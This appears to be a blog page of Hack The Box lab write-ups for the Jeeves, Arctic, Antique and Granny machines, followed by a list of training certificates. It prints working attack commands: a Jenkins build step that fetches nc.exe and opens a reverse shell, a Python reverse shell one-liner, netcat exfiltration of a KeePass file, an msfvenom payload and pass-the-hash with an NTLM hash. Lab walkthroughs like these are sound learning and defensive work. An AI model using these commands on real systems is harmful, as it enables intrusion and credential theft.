Jeeves writeup

Box name: Jeeves

Difficulty: Medium

OS: Windows

Overview: Jeeves is not overly complicated, however it focuses on some interesting techniques and provides a great learning experience. As the use of alternate data streams is not very common, some users may have a hard time locating the correct escalation path.

Link: https://app.hackthebox.com/machines/Jeeves?sort_by=created_at&sort_type=desc

Scanned the target with rustscan.

rustscan -a 10.129.228.112 –ulimit 5000 -b 2000 — -A -Pn

Navigated to the webserver.

Coincidentally enough, a coworker recently brought up Ask Jeeves to me. It was a popular search engine before I was even born. Ran feroxbuster while I poke around.

feroxbuster -u http://10.129.228.112 -w /usr/share/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-2.3-big.txt

I didn’t end up finding anything important and all this site is doing is acting as a search engine. Thought I was not able to navigate directly to the webserver on 10.129.228.112:50000, when I directory busted it I found an askjeeves directly.

feroxbuster -u http://10.129.228.112:50000/ -w /usr/share/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-2.3-big.txt –force-recursion

Navigated to the server.

Version 2.87. After some poking around we can build a new item to execute a command we want. We can download nc.exe to the machine then run it. While having nc.exe with a http.server set up and a nc listener on 1337 we can create a new item with whatever name, select ‘Freestyle project’, ‘OK’, scroll down to ‘Build’, select ‘Execute Windows batch command’ and in my case use this script:

powershell wget “http://10.10.14.42/nc.exe” -outfile “nc.exe”

nc.exe -e cmd.exe 10.10.14.42 1337

Select ‘Apply’ then ‘Save’, go back then ‘Build Now’.

We can get user.txt.

In Documents there is a CEH.kdbx file that looks interesting.

From past experience and notes we can crack this with john. We can move the file to our machine with netcat.

nc.exe -w 3 10.10.14.42 1338 < C:\Users\kohsuke\Documents\CEH.kdbx (from victim)

nc -lnvp 1338 > CEH.kdbx (on attacker)

Then we can try to crack it.

keepass2john CEH.kdbx > CEH.hash

I tried:

john CEH.hash

But that was taking forever for some reason so I ended up just using rockyou.

john CEH.hash –wordlist=/usr/share/wordlists/rockyou.txt –rules=best64

And we get the password moonshine1

Opened the file with keepassxc.

keepassxc CEH.kdbx

After poking around with the credentials, I was able to get in with the NTLM hash in ‘Backup stuff’.

impacket-psexec Administrator@10.129.228.112 -hashes aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00

When looking for the root I found the text file but it says the flag is elsewhere.

I recall seeing this part on the box before in some PNPT training material. There’s an ADS for hm.txt. We can get root with 

powershell Get-Content -Path “hm.txt” -Stream “root.txt”

GG

Attack Chain

1 – Reconnaissance Ran RustScan and identified ports 80 (HTTP), 135 (MSRPC), 445 (SMB), and 50000 (HTTP). Browsed to port 80 which presented a fake Ask Jeeves search page with no useful functionality. Ran feroxbuster against both ports while poking around manually.

rustscan -a 10.129.228.112 –ulimit 5000 -b 2000 — -A -Pn feroxbuster -u http://10.129.228.112 -w /usr/share/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-2.3-big.txt

2 – Enumeration – Jenkins on port 50000 Port 50000 did not load directly in the browser but directory busting revealed an /askjeeves path hosting a Jenkins instance running version 2.87. Jenkins was accessible with no authentication required.

feroxbuster -u http://10.129.228.112:50000/ -w /usr/share/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-2.3-big.txt –force-recursion

3 – Initial Access – Jenkins arbitrary command execution Created a new Freestyle project in Jenkins and added an Execute Windows Batch Command build step. Used PowerShell to download nc.exe from the attack machine then executed it to call back to a netcat listener. Obtained a shell as kohsuke and retrieved user.txt.

powershell wget “http://10.10.14.42/nc.exe&#8221; -outfile “nc.exe” nc.exe -e cmd.exe 10.10.14.42 1337

4 – Privilege Escalation – KeePass database cracking Found a CEH.kdbx KeePass database in the Documents folder. Transferred it to the attack machine using netcat, extracted the hash with keepass2john, and cracked it with John the Ripper using rockyou. Opened the database in KeePassXC and found an NTLM hash stored in an entry called Backup stuff.

nc.exe -w 3 10.10.14.42 1338 < C:\Users\kohsuke\Documents\CEH.kdbx nc -lnvp 1338 > CEH.kdbx keepass2john CEH.kdbx > CEH.hash john CEH.hash –wordlist=/usr/share/wordlists/rockyou.txt –rules=best64

5 – Lateral Movement – pass the hash as Administrator Used the recovered NTLM hash with impacket-psexec to authenticate as Administrator without needing the plaintext password.

impacket-psexec Administrator@10.129.228.112 -hashes aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00

6 – Post-Exploitation – Alternate Data Stream The root flag was not in the expected location. hm.txt on the Administrator desktop contained a message saying the flag was elsewhere. The actual flag was hidden in an Alternate Data Stream attached to hm.txt and was read using PowerShell.

powershell Get-Content -Path “hm.txt” -Stream “root.txt”

---

Key Takeaways

1. Jenkins exposed with no authentication – The Jenkins instance on port 50000 required no login, giving any visitor the ability to create and execute build jobs. Unauthenticated access to CI/CD tooling is a critical finding as these platforms are designed to run arbitrary code.
2. Non-standard ports not reducing exposure – Port 50000 was not immediately obvious from a browser but was trivially discovered through directory busting. Services on non-standard ports still require authentication and access controls.
3. Credentials and hashes stored in KeePass on a shared system – A KeePass database containing Administrator NTLM hashes was stored in a user’s Documents folder on a machine accessible after exploitation. Privileged credential stores should not reside on systems that users can access.
4. NTLM hash sufficient for authentication – The Administrator NTLM hash was usable directly for pass-the-hash without cracking. NTLM authentication should be disabled where possible in favor of Kerberos and credential guard should be enabled to protect hashes in memory.
5. Alternate Data Streams as a hiding technique – The root flag was concealed in an ADS, a Windows NTFS feature that attaches hidden data to files without changing the visible file size or content. ADS can be used by attackers to hide tools, payloads, or exfiltrated data and are not visible with standard directory listings.

---

Remediation

[Immediate] Require authentication on Jenkins Enable Jenkins authentication and authorisation immediately. Apply role-based access control so only authorised users can create or trigger build jobs. Place Jenkins behind a VPN or restrict access by IP and never expose it directly to an untrusted network.

[Immediate] Rotate all credentials found in the KeePass database Any credential or hash recovered from the database should be considered compromised. Rotate all affected passwords immediately and invalidate any NTLM hashes by resetting the associated accounts.

[Immediate] Disable NTLM where possible Configure Group Policy to restrict NTLM authentication across the domain and enforce NTLMv2 at minimum where NTLM cannot be fully disabled. Enable Windows Defender Credential Guard to prevent hash extraction from memory.

[Short-term] Audit NTFS Alternate Data Streams Run periodic scans across sensitive directories for unexpected ADS using tools such as streams.exe from Sysinternals. Implement file integrity monitoring on critical paths to detect ADS creation as part of a defence-in-depth strategy.

[Short-term] Restrict placement of credential databases KeePass databases and other credential stores should not be stored on general-purpose servers. If a password manager is required for operational use, store it on a dedicated bastion or secrets management platform with access logging and MFA enforcement.

[Long-term] Implement a CI/CD security baseline Define and enforce a hardening standard for all CI/CD tooling including Jenkins. This should cover authentication, authorisation, agent isolation, secret management, and network segmentation. Build jobs should run in isolated environments with no access to production credentials.

Arctic Writeup

Box name: Arctic

Difficulty: Easy

OS: Windows

Overview: Arctic is an easy Windows machine that involves straightforward exploitation with some minor challenges. The process begins by troubleshooting the web server to identify the correct exploit. Initial access can be gained either through an unauthenticated file upload in Adobe ColdFusion. Once a shell is obtained, privilege escalation is achieved using the MS10-059 exploit.

Link: https://app.hackthebox.com/machines/Arctic?sort_by=created_at&sort_type=desc

Machine IP: 10.129.9.133

Scanned the machine with rustscan.

rustscan -a 10.129.9.133 --ulimit 5000 -b 2000 -- -A -Pn

Only familiar of port 135 right aware buy from recent notes I would need credentials. Checked out hacktricks for more information https://hacktricks.wiki/en/network-services-pentesting/135-pentesting-msrpc.html. I don’t think I can get anything from that port aqt this time. 8500 is a http server though so lets check that. This looks to bring us to some sort of directory.

Going to run feroxbuster while I check out these directories as there is a lot.

feroxbuster -u http://10.129.9.133:8500/ -w /usr/share/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-2.3-big.txt

In artgallery I found a bunch of names that could possibly be usernames. Notated those.

The next two things I found interesting was an Adobe Coldfusion Administrator log in and a WebWorks Help version.

Feroxbuster didn’t find anything new. I googled exploits for Adobe coldfusion (also just guessing this is the path considering the room name) and found this RCE https://www.exploit-db.com/exploits/50057. Editted the payload and we got in.

Got user.txt

I’m pretty shit at manual local windows enumeration so I want to try this first before trying winpeas. Right away the impersonate token looks interesting.

From my notes, I’m currently only familiar of using metasploit to take advantage of this. There are other attacks I have notes on but haven’t tried yet. Created a payload.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.42 LPORT=4444 -f exe -o shell.exe

Served it up on an http.server.

sudo python3 -m http.server

Downloaded the new payload to the machine.

Set up a handler in metasploit and ran it.

Turns out there are no tokens though.

Ran ps to check services and migrated to jrunsvc.exe.

I tried windows/local/ms16_075_reflection but it didn’t create a session. I did some further manual enumeration but couldn’t see anything obvious. I ended up just running Metasploits local exploit suggester. I was able to get root with windows/local/ms10_092_schelevator.

And we get root.

GG

Antique writeup

Box name: Antique

Difficulty: Easy

OS: Linux

Overview: Antique is an easy Linux machine featuring a network printer disclosing credentials through SNMP string which allows logging into telnet service. Foothold can be obtained by exploiting a feature in printer. CUPS administration service running locally. This service can be exploited further to gain root access on the server.

Link: https://app.hackthebox.com/machines/Antique?sort_by=created_at&sort_type=desc

Machine IP: 10.129.8.229

Ran rustscan. 

rustscan -a 10.129.8.229 –ulimit 5000 -b 2000 — -A -Pn

This is telnet. Tried telnetting to the device but it is asking us for a password.

Since there was no other information I tried the default password of admin, and a bunch of other simple credentials but nothing worked. I scanned for udp since I couldn’t find anything else.

nmap -sU –top-port 100 10.129.8.229

Ran snmpwalk and got the community string.

snmpwalk -v 2c -c public 10.129.8.229

I tried bruteforcing the OID with braa but it didnt get anything. Instead, and I just learned this, all OIDs are public. We can use snmpwalk again.

snmpwalk -v 2c -c public 10.129.8.229 1.3.6.1.4.1.11.2.3.9.1

Here’s a breakdown of the OID for understanding.

We got some BITS back in hex value. Dropped that in Cyberchef.

Got password P@ssw0rd@123!!123 tried it on telnet and we got logged in.

Initially I tried listing any files but I kept getting a ‘Err updating configuration’. I ran ‘?’ and it shows we can exec commands.

I set up a listener, played with some shells and this one worked.

export RHOST=”10.10.14.42″;export RPORT=1337;python3 -c ‘import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv(“RHOST”),int(os.getenv(“RPORT”))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn(“sh”)’

We are user lp. Stabilized shell and there is user.txt in the directory we are already in.

After some linux local enumeration, I eventually found an internal port open on 631.

netstat -ano

Tried downloading chisel to the server but I don’t think it has internet. Downloaded on my machine, unzipped it, renamed it, made it executable and server it up on an http.server.

Downloaded it to the machine.

Set up a chisel listener.

Had the device connect back as well.

Checking out the webserver there is a CUPS 1.6.1 page.

After some research and testing, we can use cupsctl to change the output of the ErrorLog and as it’s running as root we can just output root.txt. Ran this on the victim machine.

cupsctl ErrorLog=”/root/root.txt”

Ran curl on my machine.

curl http://localhost:631/admin/log/error_log?

And we get root.txt

Box name: Granny

Difficulty: Easy

OS: Windows

Overview: Granny, while similar to Grandpa, can be exploited using several different methods. The intended method of solving this machine is the widely-known Webdav upload vulnerability.

Link: https://app.hackthebox.com/machines/Granny?sort_by=created_at&sort_type=desc

Machine IP: 10.129.95.234

Scanned the machine with Rustscan.

rustscan -a 10.129.95.234 --ulimit 5000 -b 2000 -- -A -Pn

Navigated to the website.

We see an IIS server that is not fully set up. Nothing of importance in robots.txt and sourcecode. Ran feroxbuster.

feroxbuster -u http://10.129.95.234 -w /usr/share/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-2.3-big.txt

There is an image directory that looks interesting.

ISS servers usually have WebDAV ontop of it. Running nmap scripts to see if this does exist.

nmap --script http-enum 10.129.95.234

This was taking forever. Regardless I google the version of the IIS server and there is a vulnerability CVE-2017-7269. I already know there’s a Metasploit module we can use for the exploit from my notes.

Ran it and were in with a low level service.

I tried to see if we could get user.txt but looks we can not yet but there is a Lakis user.

Since we have a meterpreter lets just have metasploit do the work for us.

These are the results.

Considering this is a webdav box I read that exploit through online here https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/windows/local/ms16_016_webdav.md. I checked systeminfo and it is x86 but the OS isn’t the same. I looked through the other exploits and ms15_051_client_copy_image looked the most interesting. Migrated to a different process then ran it and we got nt authority\system.

Then we can get the flags.

GG

Posting some certificates here for posterity sake as I’ve been told it is basically fluff on my LinkedIn.

Tryhackme

SOC Level 1 learning path

Security Engineer learning path

Red Teaming learning path

Junior Penetration Tester learning path

CompTIA Pentest+ learning path

Web application pentesting learning path

SOC Level 2 learning path

DevSecOps learning path

Offensive pentesting learning path

SoloLearn programming

Python Intermediate learning course

Python core learning course

Python for beginners learning course

CSS learning course

PHP learning course

HTML Learning course

GG